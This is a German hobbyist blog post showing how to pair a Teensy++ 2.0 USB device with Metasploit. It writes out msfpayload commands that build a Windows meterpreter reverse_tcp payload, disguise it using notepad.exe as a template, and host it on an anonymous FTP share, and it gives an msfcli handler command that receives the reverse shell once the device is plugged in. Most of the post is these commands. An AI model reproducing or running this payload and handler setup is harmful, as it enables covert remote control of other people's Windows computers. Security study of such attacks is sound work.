Hacking mit Teensy++ 2.0
Dieser Beitrag wurde vor über 3 Monaten veröffentlicht. Die darin beschriebenen Informationen sind mit Vorsicht zu geniessen, da sie bereits veraltet oder nicht mehr gültig sein könnten. Solltest du von Neuerungen oder Verbesserungen wissen, so freue ich mich über einen klärenden Kommentar.Um nicht immer gleich SET auffahren zu müssen, wenn ich meinen Payload generieren will, habe ich mich daran gemacht, einen eigenen, universellen Payload zu erstellen.
Wichtig daran, das, nicht wie bei SET, an eine öffentliche IP weitergeleitet wird, damit das ganze auch universell einsetzbar wird! Wer hier keine fixe IP zur Hand hat, kann auch DynDNS verwenden.
So gilt es zuerst den richtigen Payload zu finden:
msfpayload -l
Hier erhält man eine ganze Auswahl an möglichen Payloads. Da ich mein System aber steuern will entscheide ich mich für ein reverse-Payload wie zum Beispiel meterpreter/reverse_tcp.
Nun muss ich all die Arbeit von Hand machen, die mir sonst SET abgenommen hat. Ich schaue mir also noch die offenen Optionen an:
./msfpayload windows/meterpreter/reverse_tcp s
Offen ist noch der LHOST. Hier setzte ich die öffentliche IP meines Anschlusses. Auch ist es ganz empfehlenswert den Port unter LPORT zum Beispiel auf 80, 8080 oder 443 zu setzen:
./msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 s
Ist das alles gesetzt, so wird das ganze als rohe Daten ausgegeben und mittels msfencode gleich wieder codiert.
./msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 \ LPORT=443 X > /root/Desktop/x.exe
Um das ganze noch echter zu machen, wird als Vorlage notepad.exe oder auch jede andere beliebige, ausführbare Datei genommen.
Dies kommt nun in das Directory, welches der FTP für anonyme Benutzer freigibt.
Nun muss noch der Handler erstellt werden. Dazu wird die Konsole von Metasploit mit den passenden Daten gefüttert:
./msfcli exploit/multi/handler \ PAYLOAD=windows/meterpreter/reverse_tcp \ LHOST=0.0.0.0 \ LPORT=443 E
Der Code auf dem teensy++ bleibt der selbe wie aus dem vorgehenden Artikel. Und sobald nun etwas eingesteckt wird, öffnet Metasploit eine Verbindung:
Das könnte dich auch interessieren:
- teensy++ hacking: besser, schneller Ich habe in einer Veröffentlichung im Security-Magazin hakin9.org mal über das Framework SET (Social Engeineering Toolkit) geschrieben. Darin gab es seither immer ein Punkt, den ich nicht nutzen konnte. So...
- Der Alptraum für jeden Computer Heute ist mein Teensy++ 2.0 endlich aus der USA rübergeflogen gekommen. Bestellen konnte ich ihn nur noch da, da er weder in der Schweiz, noch in Deutschland oder sonst wo...